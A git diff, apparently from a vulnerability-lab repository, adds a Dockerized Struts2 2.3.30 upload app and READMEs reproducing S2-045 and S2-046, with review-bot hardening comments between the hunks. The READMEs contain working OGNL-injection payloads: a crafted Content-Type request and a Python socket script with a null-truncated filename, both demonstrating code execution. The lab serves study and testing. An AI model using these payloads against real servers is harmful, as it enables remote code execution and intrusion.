diff --git a/base/struts2/2.3.30/Dockerfile b/base/struts2/2.3.30/Dockerfile
new file mode 100644
index 0000000000..da030df0ca
--- /dev/null
+++ b/base/struts2/2.3.30/Dockerfile
@@ -0,0 +1,12 @@
+FROM maven:3-jdk-8
+
+LABEL maintainer="phithon "
+
+COPY ./ /usr/src/
+WORKDIR /usr/src
+
+RUN set -ex \
+ && mvn compile jetty:help
+
+EXPOSE 8080
+CMD ["mvn", "jetty:run"]
diff --git a/base/struts2/2.3.30/pom.xml b/base/struts2/2.3.30/pom.xml
new file mode 100644
index 0000000000..df30b310ac
--- /dev/null
+++ b/base/struts2/2.3.30/pom.xml
@@ -0,0 +1,39 @@
+ + 4.0.0 + org.pwntester + Struts2FileUpload + war + 1.0-SNAPSHOT + Struts2FileUpload Maven Webapp + http://maven.apache.org + + + + org.apache.struts + struts2-core + 2.3.30 + + + + + + Struts2FileUpload + + + org.eclipse.jetty + jetty-maven-plugin + 9.2.11.v20150529 + + 10 + + / + + + 8080 + + + + + +
diff --git a/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java b/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java
new file mode 100755
index 0000000000..3a3d965624
--- /dev/null
+++ b/base/struts2/2.3.30/src/main/java/org/pwntester/action/FileUploadAction.java 
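Review bot: `FROM maven:3-jdk-8` is a floating tag, so the base this fixed-version Struts lab is built on changes silently between rebuilds; pinning it by digest, `FROM maven:3-jdk-8@sha256:<digest-placeholder>`, keeps the image reproducible, which matters more than usual when the whole point of the image is a specific vulnerable dependency set. `COPY ./ /usr/src/` copies the entire build context, so without a `.dockerignore` anything sitting next to the Dockerfile (local `target/` output, editor files) ends up in the image; presumably only `pom.xml` and `src/` are needed. A one-line comment on the `RUN` step saying that `mvn compile jetty:help` exists only to pre-fetch dependencies at build time would explain an otherwise odd-looking goal choice.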
@@ -0,0 +1,55 @@
+package org.pwntester.action;
+
+import com.opensymphony.xwork2.ActionSupport;
+import java.io.File;
+
+public class FileUploadAction extends ActionSupport {
+
+ private String contentType;
+ private File upload;
+ private String fileName;
+ private String caption;
+
+ public String input() throws Exception {
+ return SUCCESS;
+ }
+
+
+ public String upload() throws Exception {
+ return SUCCESS;
+ }
+
+ public String getUploadFileName() {
+ return fileName;
+ }
+
+ public void setUploadFileName(String fileName) {
+ this.fileName = fileName;
+ }
+
+ public String getUploadContentType() {
+ return contentType;
+ }
+
+ public void setUploadContentType(String contentType) {
+ this.contentType = contentType;
+ }
+
+ public File getUpload() {
+ return upload;
+ }
+
+ public void setUpload(File upload) {
+ this.upload = upload;
+ }
+
+ public String getCaption() {
+ return caption;
+ }
+
+ public void setCaption(String caption) {
+ this.caption = caption;
+ }
+}
+
+
diff --git a/base/struts2/2.3.30/src/main/resources/global.properties b/base/struts2/2.3.30/src/main/resources/global.properties
new file mode 100644
index 0000000000..c44b2d81a0
--- /dev/null
+++ b/base/struts2/2.3.30/src/main/resources/global.properties
@@ -0,0 +1,3 @@
+struts.messages.error.file.too.large = Uploaded File size is too large
+struts.messages.error.content.type.not.allowed =File type is not allowed.
+struts.messages.error.file.extension.not.allowed =File extension is not allowed.
\ No newline at end of file
diff --git a/base/struts2/2.3.30/src/main/resources/struts.xml b/base/struts2/2.3.30/src/main/resources/struts.xml
new file mode 100755
index 0000000000..34f39d23b9
--- /dev/null
+++ b/base/struts2/2.3.30/src/main/resources/struts.xml
@@ -0,0 +1,25 @@
+ + + + + + + + + + + + + + pages/upload.jsp + + + + pages/upload.jsp + pages/upload-success.jsp + + + +
\ No newline at end of file 
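Review bot: `setUploadFileName` stores the multipart filename exactly as the client sent it and nothing else in the class normalizes it, so any consumer of `getUploadFileName` that builds a path from the value inherits directory separators or `..` segments; since `java.io.File` is already imported, `this.fileName = fileName == null ? null : new File(fileName).getName();` keeps only the leaf name without changing the property contract. `input()` overrides `ActionSupport.input()` but carries no `@Override`, and both `input()` and `upload()` declare `throws Exception` although neither body can throw a checked exception, so the clause can be dropped on both. `upload()` never touches the `upload` file, which looks intentional for a lab action, but a class-level comment stating that the action only exposes the interceptor-populated properties and performs no storage would save the next reader from looking for missing code; presumably the framework removes the temporary file afterwards, which is worth confirming in that comment.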
diff --git a/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml b/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml new file mode 100755 index 0000000000..4e83f46cbb --- /dev/null +++ b/base/struts2/2.3.30/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,17 @@ + + + + Struts 2 Web Application + + + struts2 + org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter + + + struts2 + /* + + + \ No newline at end of file diff --git a/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp b/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp new file mode 100755 index 0000000000..566be1aeba --- /dev/null +++ b/base/struts2/2.3.30/src/main/webapp/pages/upload-success.jsp @@ -0,0 +1,27 @@ +<%@ taglib prefix="s" uri="/struts-tags" %> + + + Struts2 Showcase - Fileupload sample + + + + + +
+
+
+ + + + + + + +
+
+
+ + + diff --git a/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp b/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp new file mode 100755 index 0000000000..b02a89cdc3 --- /dev/null +++ b/base/struts2/2.3.30/src/main/webapp/pages/upload.jsp @@ -0,0 +1,31 @@ +<%@ page + language="java" + contentType="text/html; charset=UTF-8" + pageEncoding="UTF-8"%> +<%@ taglib prefix="s" uri="/struts-tags" %> + + + Struts2 Showcase - Fileupload sample + + + + + +
+
+
+
    +
  • ContentType:
  • +
  • FileName:
  • +
  • File:
  • +
  • Caption:
  • +
+
+
+
+ + + + diff --git a/struts2/s2-045/1.png b/struts2/s2-045/1.png new file mode 100644 index 0000000000..cfec1b4544 Binary files /dev/null and b/struts2/s2-045/1.png differ diff --git a/struts2/s2-045/README.md b/struts2/s2-045/README.md new file mode 100644 index 0000000000..566b612400 --- /dev/null +++ b/struts2/s2-045/README.md @@ -0,0 +1,39 @@ +# S2-045 远程代码执行漏洞(CVE-2017-5638) + +影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 + +漏洞详情: + + - http://struts.apache.org/docs/s2-045.html + - https://blog.csdn.net/u011721501/article/details/60768657 + - https://paper.seebug.org/247/ + +## 漏洞环境 + +执行如下命令启动struts2 2.3.30: + +``` +docker-compose up -d +``` + +环境启动后,访问`http://your-ip:8080`即可看到上传页面。 + +## 漏洞复现 + +直接发送如下数据包,可见`233*233`已成功执行: + +``` +POST / HTTP/1.1 +Host: localhost:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,es;q=0.6 +Connection: close +Content-Length: 0 +Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data + + +``` + +![](1.png) diff --git a/struts2/s2-045/docker-compose.yml b/struts2/s2-045/docker-compose.yml new file mode 100644 index 0000000000..68a1132844 --- /dev/null +++ b/struts2/s2-045/docker-compose.yml @@ -0,0 +1,6 @@ +version: '2' +services: + struts2: + image: vulhub/struts2:2.3.30 + ports: + - "8080:8080" diff --git a/struts2/s2-046/1.png b/struts2/s2-046/1.png new file mode 100644 index 0000000000..d438793f8f Binary files /dev/null and b/struts2/s2-046/1.png differ diff --git a/struts2/s2-046/README.md b/struts2/s2-046/README.md new file mode 100644 index 0000000000..c07019527f --- /dev/null +++ b/struts2/s2-046/README.md 
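Review bot: `- "8080:8080"` publishes the service on every interface of the Docker host, and `image: vulhub/struts2:2.3.30` is by design a build with a known remote code execution flaw, so the exposure of the lab is as wide as the host's network; binding the published port to loopback, `- "127.0.0.1:8080:8080"`, keeps it reachable from the host itself while `docker-compose up -d` continues to work unchanged. The README's `http://your-ip:8080` instruction would then need to say `localhost` or the user would have to widen the binding deliberately. The s2-046 docker-compose.yml hunk below contains the same line and the same point applies there.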
@@ -0,0 +1,55 @@ +# S2-046 远程代码执行漏洞(CVE-2017-5638) + +影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 + +漏洞详情: + + - https://cwiki.apache.org/confluence/display/WW/S2-046 + - https://xz.aliyun.com/t/221 + +## 漏洞环境 + +执行如下命令启动struts2 2.3.30: + +``` +docker-compose up -d +``` + +环境启动后,访问`http://your-ip:8080`即可看到上传页面。 + +## 漏洞复现 + +与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用`\x00`截断。 + +由于需要发送畸形数据包,我们简单使用原生socket编写payload: + +```python +import socket + +q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2 +Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b" +Content-Type: text/plain + +foo +------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n') +p = b'''POST / HTTP/1.1 +Host: localhost:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,es;q=0.6 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2 +Content-Length: %d + +'''.replace(b'\n', b'\r\n') % (len(q), ) + +with socket.create_connection(('your-ip', '8080'), timeout=5) as conn: + conn.send(p + q) + print(conn.recv(10240).decode()) + +``` + +`233*233`已成功执行: + +![](1.png) diff --git a/struts2/s2-046/docker-compose.yml b/struts2/s2-046/docker-compose.yml new file mode 100644 index 0000000000..68a1132844 --- /dev/null +++ b/struts2/s2-046/docker-compose.yml @@ -0,0 +1,6 @@ +version: '2' +services: + struts2: + image: vulhub/struts2:2.3.30 + ports: + - "8080:8080"